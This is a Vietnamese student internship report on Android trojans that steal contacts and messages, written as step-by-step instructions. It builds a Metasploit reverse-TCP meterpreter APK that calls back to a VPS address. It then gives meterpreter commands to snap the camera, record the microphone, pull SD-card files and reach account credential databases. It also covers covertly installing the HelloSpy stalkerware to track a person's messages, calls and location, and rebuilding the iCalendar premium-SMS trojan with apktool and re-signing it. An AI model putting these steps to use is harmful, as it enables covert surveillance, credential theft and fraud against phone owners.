GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 1

BÁO CÁO ĐỀ TÀI THỰC TẬP

ĐỀ TÀI:

NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH

CẮP, SẮP XẾP DỮ LIỆU NHƯ DANH BẠ, TIN NHẮN TRÊN ĐIỆN

THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI.

GIÁO VIÊN HƯỚNG DẪN: VÕ ĐỖ THẮNG

SINH VIÊN THỰC HIỆN: NGUYÊN XUÂN NGOC

Tạo mã độc trên VPS để xâm nhập Android

(28/08/2014)

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 2

Nội dung:

1. Tên đề tài:

Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh

sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài.

2. Yêu cầu:

Phần 2: Thực hiện trên môi trường Virtual Private Server – VPS (server có

internet)

2.1 Cài đặt autosploit trên VPS

2.2 Tạo mã độc trên VPS

2.3 Cho phép xâm nhập vào android1, android2, android3… gửi data từ các

android về VPS

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 3

II/ THỰC HIÊN TRÊN MÔI TRƯƠNG INTERNET

1/ Cài mã độc trên VPS

1.1/ Cài đặt Metasploit lên VPS

a/ Giới thiệu

Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn

công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng

Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy

trên hầu hết các hệ điều hành: Linux, Windows, MacOS.

b/ Cài đặt

Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn

phiên bản Community miễn phí và dùng cho nghiên cứu.

Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm

khác.

Chọn folder cài đặt:

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 4

Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:

Chọn server và ngày hết hạn, để mặc định:

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 5

Quá trình cài đặt của Metasploit:

Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 6

Sau khi Finish trình duyệt web mở lên và đi tới giao diện

Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào

Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create

Account:

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 7

Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn

phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:

2/ Từ VPS điều khiển thiết bị qua internet

Các bước thực hiện

1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào

Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS

Chúng ta vẫn sử dụng lệnh

“Msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 8

lport=4444 R > /root/Desktop/files.apk”

ở đây địa chỉ VPS là 14.0.21.132

2. Khởi động Metasploit Console trên VPS

3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần

trên, ở đây chỉ khác là sử dụng chính IP của VPS

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 9

4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị

hack

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 10

Để xem thông tin về máy, nhập lệnh SysInfo

• Sử dụng camera:

Để xem danh sách camera, nhập webcam_list

Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở

danh sách camera ở phần trước.

• Ghi âm

Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 11

• Lấy file từ sd card

Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục

Dùng lệnh cd /sdcard/Download để vào thư mục

Để tải về máy, ta nhập lệnh

Download madoc.apk

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 12

Một số lệnh khác :

để upload gõ lệnh upload

Và file này sẽ được tải về thư mục root của máy Kali

Gõ shell để vào lệnh

kiểm tra xem có root chưa gõ

su

whoami

Nếu báo unknown id is 0 tức là đã root

ls -l danh mục file và các quyền

cd để chuyển hướng thư mục

Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền

/DATA

/DATA/APP

/DATA/SYSTEM

/DATA/SYSTEM/accounts.db

/DATA/SYSTEM/SYNC/accounts.xml

/SYSTEM/APP/

để xem danh sách và down load các file hay thay đổi các file trong ROM

đầu tiên phải gõ lệnh SU để có toàn quyền truy cập

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 13

để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename

Ví dụ chmod -R 777 /data

^C để quay lại

Sử dụng SQLite để mở file db

3/ Ứng dụng HelloSpy

3.1. Tải về và cài đặt HelloSpy

HelloSpy có nhiều tính năng theo dõi như:

o Theo dõi vị trí thiết bị

o Lịch sử vị trí trong vòng 24 giờ o Theo dõi tin nhắn

o Theo dõi danh bạ o Theo dõi nhật kí cuộc gọi

o Lịch sử URL, lịch sử hình ảnh, lịch sử ứng dụng…

Android 2.x: HelloSpy.com/downloads/hellotarget2.apk Android 4.x: HelloSpy.com/downloads/hellotarget4.apk

Các bạn mở trình duyệt internet trên điện thoại và tải 1 trong 2 phiên bản trên .

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 14

Sau khi việc tải đã hoàn tất, các bạn tiến hành cài đặt như các phần mềm khác .

2. Sử dụng sau khi việc tải và cài đặt xong, các bạn phải khởi động lại máy ,

sau đó các bạn gọi số : “ #8888* “ để gọi phần mềm HelloSpy

Nếu bạn là người mới sử dụng , các bạn tiến hành các thao tác đăng kí User

.

và bước cuối cùng là Log In tài khoản các bạn vừa tạo

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 15

Tại đây, ta đăng nhập với tài khoản email đã đăng kí, sau đó khởi động lại máy. Từ bây giờ

chỉ cần điện thoại được kết nối mạng là ta có thể biết được người dùng đã nhắn tin, gọi điện

hay thậm chí biết cả vị trí của họ mà chỉ cần vào đăng nhập vào tài khoản đã nhập trong

điện thoại của họ trên trang chủ của HelloSpy.

4/ Cài đặt chương trình tích hợp mã độc (Trojan) trên Android

4.1/ Giới thiệu

iCalendar là một phần mềm được tích hợp mã độc có xuất xứ từ Trung Quốc, người dùng

cài đặt chương trình sau khi chạy chương trình sẽ tự động gửi tin nhắn mà không hề mong

muốn. Bằng cách này, điện thoại của nạn nhân sẽ bị trừ tiền mà không rõ nguyên do.

4.2/ Công cụ :

a/ Java JDK

Java là một công nghệ xây dựng các ứng dụng phần mềm. Nó được coi là công nghệ

mang tính cách mạng và khả thi nhất trong việc tạo ra các ứng dụng có khả năng chạy thống nhất

trên nhiều nền tảng mà chỉ cần biên dịch một lần.

Java còn là một nền tảng phát triển và triển khai ứng dụng trong đó máy ảo Java, bộ thông dịch

có vai trò trung tâm.

Chúng ta có thể tải Java JDK về tại:

http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html

Tại đây, ta chỉ việc ấn vào Accept LicenseAgreement rồi chọn phiên bản để tải về.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 16

b./ Android SDK

Android SDK là một máy ảo của Android trên PC. Android SDK giúp hỗ trợ lập trình các

ứng dụng của Android trên PC, hỗ trợ bạn những chức năng không khác gì một chiếc máy thật.

Ta có thể tải Android SDK tại: http://developer.android.com/sdk/index.html

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 17

Đầu tiên, ta sẽ giải nén thư mục vừa tải về. Sau đó vào eclipse.exe trong thư mục eclipse.

Kế tiếp ta vào Windows -> Android SDK Manager sau đó bạn chọn phiên bản Android

muốn tải về, sau đó ta ấn Install ….

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 18

Sau khi tải xong, ta vào Windows -> Android Virtual Device Manager và tạo một

smartphone hệ điều hành Android theo ý thích.

Sau đó ta ấn Start và một smartphone ảo với hệ điều hành Adroid đã lựa chọn sẽ hiện ra.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 19

c/ Apktool

Apktool là công cụ dùng để giải mã các file apk và jar, phục vụ cho việc tùy chỉnh, sửa đổi

các file đó.

Ta có thể tải về tại: https://code.google.com/p/android-apktool/

4.3/ Hướng dẫn cài đặt Trojan iCalendar trên Android SDK

Trước tiên, ta copy file iCalendar.apk vào thư mục apktool và mở CMD rồi di chuyển vào

thư mục apktool. Kế tiếp ta giải mã iCalendar bằng lệnh :

Apktool if iCalendar.apk

Apktool d iCalendar.apk

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 20

Vậy là ta đã tạo được thư mục giải mã iCalendar ta vào thư mục đó rồi vào smali ->com -

> mj -> iCalendar.

Tại đây, ta mở file iCalendar.smali rồi sử số trong dấu ngoặc kép của line 252 thành số

điện thoại sẽ nhận tin nhắn và nội dung tin nhắn sẽ gửi tại local v1 ngay dưới đó.

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 21

Ta làm tương tự với smsReceive.smali tại line 41.

Bây giờ ta sẽ biên soạn lại iCalendar bằng lệnh:

Apktool b iCalendar

Vậy là trong thư mục dist của iCalendar đã có một file iCalendar.apk dã được biên soạn

lại.

Kế tiếp ta sẽ copy file iCalendar.apk vừa tạo vào thư mục cài đặt Java JDK để signing cho

nó. Sau khi di chuyển vào thư mục Java JDK, ta dùng lệnh:

keytool –genkey –v –keystore iCalendar.keystore –alias iCalendar –keyalg RSA –keysize

2048 –validity 10000

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 22

Sau đó ta sẽ nhập password và điền một số thông tin tùy ý:

Sau đó ta dùng lệnh:

Jarsigner –verbose –keystore iCalendar.keystore iCalendar.apk iCalendar

Jarsigner –verify –verbose –certs iCalendar.apk

Bây giờ ta copy file iCalendar.apk trong Java JDK vào thư mục sdk của Android SDK và

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 23

tiến hành cài chương trình vào máy ảo ( máy ảo phải mở sẵn) :

Adb –s emulator-5558 install iCalendar.apk

Với 5558 là số điện thoại của máy cài và iCalendar.apk là tên chương trình.

Vậy là bây giờ trong máy ảo đã có chương trình iCalend

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 24

Chỉ cần mở iCalendar lên và ấn vài lần vào màn hình là đã có một tin nhắn được gửi đi mà người

sử dụng không hề hay biết ,việc này sẽ làm mất đi tiền trong tài khoản sim của bạn,

GVHD : VO ĐÔ THĂNG

August 28, 2014

Trang 25

II – NGUỒN THAM KHẢO

https://code.google.com/p/dex2jar/

https://code.google.com/p/innlab/downloads/detail?name=jd-gui-

0.3.3.windows.zip&

http://mobilelife.vn/resources/super-apk-tool-v2-0-cong-cu-chinh-sua-apk-bang-

giao-dien-cuc-manh.12/